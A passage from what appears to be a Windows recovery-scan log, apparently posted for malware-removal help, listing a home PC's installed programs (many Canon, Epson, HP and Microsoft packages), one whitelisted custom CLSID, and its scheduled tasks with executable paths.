Camera Window DVC (x32 Version: 5.4 - Canon) Hidden
Camera Window MC (x32 Version: 5.4 - Canon) Hidden
Canon Camera Window DC_DV 5 for ZoomBrowser EX (HKLM-x32\...\InstallShield_{001AB29C-5468-4972-8D24-2EBDB2B12133}) (Version: 5.4 - Canon)
Canon Camera Window DS for ZoomBrowser EX (HKLM-x32\...\InstallShield_{6B8BDABA-6737-4998-AEE4-E218EDE5FC7A}) (Version: 5.2 - Canon)
Canon Camera Window MC 5 for ZoomBrowser EX (HKLM-x32\...\InstallShield_{89EB3ED7-225A-412E-B048-623D502C000F}) (Version: 5.4 - Canon)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\InstallShield_{68D27126-BF6A-457D-8DD0-5F35E8D41310}) (Version: 1.3.1.21 - Canon)
Canon RAW Image Task for ZoomBrowser EX (HKLM-x32\...\InstallShield_{001EB665-D9EC-415E-9E13-AD2125B2B992}) (Version: 2.1 - Canon)
Canon Utilities PhotoStitch 3.1 (HKLM-x32\...\InstallShield_{218BBBE3-FE63-4BB2-81A8-7435575A84FA}) (Version: 3.1.14 - Canon)
Canon ZoomBrowser EX (HKLM-x32\...\{C1D76D7A-F3BB-47EA-A746-5B1E2FFC1DF2}) (Version: 5.02.0100 - Canon)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.3.0.5014 - Citrix Systems, Inc.)
Common System Files (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CutePDF Writer 2.8 (HKLM\...\CutePDF Writer Installation) (Version:  - )
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3101 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ENE CIR Receiver Driver (HKLM\...\FFE7D41DF3C645075BB149E21988B63996C34187) (Version: 2.7.4.0 - ENE)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.81.0000 - Seiko Epson Corporation)
Epson Event Manager (HKLM-x32\...\{9F205E94-9E42-4486-A92A-DF3F6CB85444}) (Version: 3.10.0061 - Seiko Epson Corporation)
Epson FAX Utility (HKLM-x32\...\{0CBE6C93-CB2E-4378-91EE-12BE6D4E2E4A}) (Version: 2.00.00 - Seiko Epson Corporation)
Epson PC-FAX Driver (HKLM-x32\...\EPSON PC-FAX Driver 2) (Version:  - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 2.30.00 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
EPSON WF-3620 Series Printer Uninstall (HKLM\...\EPSON WF-3620 Series) (Version:  - SEIKO EPSON Corporation)
Epson WF-3620 User’s Guide version 1.0 (HKLM-x32\...\UsersGuideEpson WF-3620 User’s Guide_is1) (Version: 1.0 - )
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION)
ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version:  - )
Facebook Plug-In (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Facebook Plug-In) (Version:  - Facebook, Inc.)
FileHippo.com Update Checker (HKLM-x32\...\FileHippo.com) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro)
Homepage Protection (HKLM-x32\...\Homepage Protection) (Version:  - AOL Products)
HouseCall for Home Networks (HKLM\...\DRScanner) (Version: 2.1.1183 - Trend Micro Inc.)
HP 3D DriveGuard (HKLM\...\{85A42FF0-F0D0-44A3-B226-C124D6E8B1D5}) (Version: 4.0.3.1 - Hewlett-Packard)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.12286.3436 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Integrated Module with Bluetooth wireless technology (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9602 - Broadcom Corporation)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart Internet TV (HKLM-x32\...\InstallShield_{E553760D-D7F7-48BF-BD8B-C7E23BA04CB5}) (Version: 3.0.1916 - Hewlett-Packard)
HP MediaSmart Live TV (HKLM-x32\...\InstallShield_{67626E09-5366-4480-8F1E-93FADF50CA15}) (Version: 3.0.1924 - Hewlett-Packard)
HP MediaSmart Movie Themes (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.0.3102 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart SlingPlayer (HKLM-x32\...\{90F6051D-A69F-4159-9203-7E20430E1056}) (Version: 2.1.1.60 - Sling Media, Inc.)
HP MediaSmart SmartMenu (HKLM\...\{88E60521-1E4E-4785-B9F1-1798A4BD0C30}) (Version: 3.0.30.1 - Hewlett-Packard)
HP MediaSmart Software Notebook Demo (HKLM-x32\...\{82A213BD-B6AA-4281-A2D3-59D51893CC56}) (Version: 1.00.0000 - Hewlett-Packard)
HP MediaSmart Webcam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.1913 - Hewlett-Packard)
HP Quick Launch Buttons (HKLM-x32\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.12.1 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.3.50.9 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.5.32.203 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HP User Guides 0154 (HKLM-x32\...\{B51605BF-6326-4553-AE96-6D7F1813D5F5}) (Version: 1.01.0001 - Hewlett-Packard)
HP Wireless Assistant (HKLM-x32\...\{54CC7901-804D-4155-B353-21F0CC9112AB}) (Version: 3.50.9.1 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6230.0 - IDT)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1883 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Kaspersky Security Scan (HKLM-x32\...\InstallWIX_{D1282694-0693-41A8-ABC1-6D1FFC1F65C5}) (Version: 15.0.0.740 - Kaspersky Lab)
Kaspersky Security Scan (x32 Version: 15.0.0.740 - Kaspersky Lab) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1913 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1913 - CyberLink Corp.) Hidden
Libronix Digital Library System (HKLM-x32\...\Libronix DLS) (Version:  - Libronix Corporation)
Libronix Digital Library System (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Libronix DLS Application (x32 Version: 1.00.0002 - Libronix Corporation) Hidden
LibronixUpdate (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{7EACD74C-147F-478C-9389-F9F52EE3C88A}) (Version: 1.18.10.2 - LightScribe)
LLS Resource Driver (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Logos Bible Software (HKLM-x32\...\{4331D6C3-912C-4015-9E2E-8149CF4AD56D}) (Version: 6.48.56 - Faithlife Corporation)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.1.94 - LSI Corporation)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Medical Office Simulation Software (MOSS) (HKLM-x32\...\ODEUNST #1) (Version:  - )
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Access 2000 Runtime (HKLM-x32\...\{00180409-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.2729 - Microsoft Corporation)
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.560.0 - Microsoft Live Search Toolbar)
Microsoft Office 365 ProPlus - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation)
Microsoft OneNote Home and Student 2016 - en-us (HKLM\...\OneNoteFreeRetail - en-us) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MovieEdit Task (x32 Version: 1.3.1.21 - Canon) Hidden
Mozilla Firefox 52.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 en-US)) (Version: 52.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2.6291 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OEB Resource Driver (x32 Version: 1.00.0002 - Libronix Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7830.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Online Plug-in (x32 Version: 14.3.0.5014 - Citrix Systems, Inc.) Hidden
Panda ActiveScan 2.0 (HKLM-x32\...\ActiveScan 2.0) (Version: 01.04.01.0014 - Panda Security)
PDF Resource Driver (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Photo Story 3 for Windows (HKLM-x32\...\{4F41AD68-89F2-4262-A32C-2F70B01FCE9E}) (Version: 3.0.1115.11 - Microsoft Corporation)
PhotoStitch (x32 Version: 3.1.14 - Canon) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3101 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3101 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3101 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3101 - CyberLink Corp.) Hidden
PowerRecover (x32 Version: 5.5.1923 - CyberLink Corp.) Hidden
QLBCASL (x32 Version: 6.40.17.2 - Hewlett-Packard) Hidden
RAW Image Task 2.1 (x32 Version: 2.1 - Canon) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0007 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30094 - Realtek Semiconductor Corp.)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Savings Bond Wizard (HKLM-x32\...\{566DBD89-9955-4024-9384-A6301C8C6584}) (Version: 4.15 - )
Self-service Plug-in (x32 Version: 4.3.0.8352 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SlingBoxWatchYourTVAnyWhere (HKLM-x32\...\{4313E16C-811B-469F-8815-6EB98085F8B2}) (Version: 2.1.1.58 - Sling Media)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.16104.4 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.16104.4 - Samsung Electronics Co., Ltd.) Hidden
Snapshot Viewer 9.0 (HKLM-x32\...\Snapshot Viewer 9.0) (Version:  - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
Understanding Health Insurance: A Guide to Billing and Reimburs (HKLM-x32\...\Understanding Health Insurance: A Guide to Billi~35254FEE_is1) (Version:  - Cengage Learning)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Live OneCare safety scanner (HKLM-x32\...\Windows Live OneCare safety scanner) (Version:  - Microsoft Corporation)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - CACE Technologies)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\KEKLR\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64\FileCoAuthLib64.dll ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04D9E3C8-0160-4165-B472-9D7D5DDC7153} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-07-23] (CyberLink)
Task: {05D97400-F4B4-461C-AE93-2E3D205377C1} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {132EC511-3C23-42C3-8C9E-CDCC63AB80F3} - System32\Tasks\HPCeeScheduleForKEKLR => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} - System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /SummerUpdate /PackageType=Free /ProductType=Free
Task: {1653F1CF-6E42-4A57-B1F3-2331E782F7DF} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {25329AA8-56DA-47A3-A214-CD57C79EE3BB} - System32\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {2F9F7F2B-9DE0-4FD3-9DD3-D5256B0C4963} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {3477DA62-7A69-452C-85C6-51B4223BF80D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {35A45B35-0D28-49CD-B470-428AAE2985FA} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-26] (Microsoft Corporation)
Task: {36B8DCAF-7E99-45E8-8CB2-EBF259655B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {461E1321-EAD9-47CE-9655-A44155D9562E} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {463B4B29-6E00-4416-A6C2-F5518E018A06} - System32\Tasks\CapSvcInst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapSvcInst.exe [2009-07-24] (CL)
Task: {4CA243C2-0C39-4E77-A907-68E5E9F001E7} - System32\Tasks\HP AR Program Upload - d4c224df55a54f048e6f468e17db3cda9ee5115ba9824a6aaa2ad50f2d58ff76 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
Task: {6ABDB4A5-5EEE-4582-AC77-71DE2C4C0276} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {78667CB8-13B8-4CD5-B743-C86376C5B946} - System32\Tasks\TVAgent => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe [2009-07-24] (CyberLink Corp.)
Task: {7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} - System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&page=tsInstall&installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:notoffered;alreadyoffered
Task: {7CEFAF45-0BAB-4607-AC88-18BAE86BCB6A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {7D6798B1-B1DF-4CBC-9367-7625DBE4C791} - System32\Tasks\{286CA1FA-44BE-4DAE-BD48-109C0D949B7C} => pcalua.exe -a "C:\Program Files (x86)\Administrative Medical Assisting\Fordney.exe" -d "C:\Program Files (x86)\Administrative Medical Assisting"
Task: {8153CE22-9583-4852-B540-A11AC6873ECC} - System32\Tasks\HP AR Program Upload - 32facac8e4824c6b8de49339b4a017b6fdc9427e5dc9450d9173ed4d1f36a800 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {8529AC47-189E-4DDF-B06C-D355E6130614} - System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&page=tsPlugin&installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault
Task: {855253AF-2866-4F9C-8CE0-9A0D144A0C17} - System32\Tasks\{50EF73A5-0164-4666-9D2A-362272AD6E5A} => pcalua.exe -a C:\Users\KEKLR\Desktop\HijackThis.exe -d C:\Users\KEKLR\Desktop
Task: {878A2D8B-887B-41B4-AD83-93D5BEE68755} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {8B0F422D-77F6-4C05-A968-99C5CD3225E9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {948B8490-55F2-4AB3-A5AE-15F63AA9A2D3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-03-26] (Microsoft Corporation)
Task: {96BEA435-3A8E-434A-9AE1-17C8BB82E9C2} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
Task: {9B2A54DA-C3A9-4829-A9E5-B33271C40E76} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe [2009-07-23] (CyberLink Corp.)
Task: {AF2F0692-3E07-4F91-87AE-683E3C6DB159} - System32\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {B6D0E72C-8127-428D-80D2-BAA383300CC4} - System32\Tasks\CapSchedInst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapSchedInst.exe [2009-07-24] (CL)
Task: {C2B2C745-6D3C-4382-8A7A-A99C23903026} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-03-02] (HP Inc.)
Task: {C9A7933D-8FBB-431A-A7A3-494F7DB92609} - System32\Tasks\{E7EAECF8-C12C-48F3-A224-0E1E8217794D} => pcalua.exe -a C:\HJT\HijackThis.exe -d C:\HJT
Task: {D34DA717-71B8-45BD-9EF4-ECE24ECC4A8F} - System32\Tasks\HP AR Program Upload - c12c17c4f19f48a296a0aa8bf65f83c9246d63c68c0b4888986ace00978760d6 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
